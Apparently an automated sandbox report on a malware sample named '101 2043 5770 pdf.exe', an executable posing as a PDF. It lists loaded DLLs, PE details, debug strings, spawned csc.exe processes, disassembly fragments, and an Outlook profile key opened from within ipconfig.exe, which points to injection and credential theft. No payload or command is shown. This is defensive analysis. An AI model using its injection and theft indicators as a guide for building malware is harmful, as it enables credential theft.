Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: version.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 101 2043 5770 pdf.exe

Static file information: File size 2148960 > 1048576

Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 101 2043 5770 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

Source: 101 2043 5770 pdf.exe	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe	Static PE information: section name: hydrated
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: hydrated

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7872177 push rbx; iretd	0_2_00007FF7D787217A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00417948 push esi; retf	6_2_00417954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4E2 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4EB push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D495 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D54C push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041665C pushad ; iretd	6_2_0041665D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041C6E2 push edi; retf	6_2_0041C6EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040C6B8 push FFFFFFA4h; ret	6_2_0040C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059609AD push ecx; mov dword ptr [esp], ecx	6_2_059609B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05890FB8 push eax; retf	6_2_05890FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E9B5 push esp; retn 0000h	6_2_0588EAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB02 push esp; retn 0000h	6_2_0588EB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB1E push esp; retn 0000h	6_2_0588EB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_101759B5 push esp; retn 0000h	7_2_10175AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B1E push esp; retn 0000h	7_2_10175B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B02 push esp; retn 0000h	7_2_10175B03
Source: C:\Windows\explorer.exe	Code function: 7_2_10177FB8 push eax; retf	7_2_10177FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF9B5 push esp; retn 0000h	7_2_106EFAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB02 push esp; retn 0000h	7_2_106EFB03
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB1E push esp; retn 0000h	7_2_106EFB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_106F1FB8 push eax; retf	7_2_106F1FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB02 push esp; retn 0000h	7_2_1124FB03
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB1E push esp; retn 0000h	7_2_1124FB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F9B5 push esp; retn 0000h	7_2_1124FAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_11251FB8 push eax; retf	7_2_11251FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F19B5 push esp; retn 0000h	7_2_112F1AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B02 push esp; retn 0000h	7_2_112F1B03
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B1E push esp; retn 0000h	7_2_112F1B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_112F3FB8 push eax; retf	7_2_112F3FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_114519B5 push esp; retn 0000h	7_2_11451AE7

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

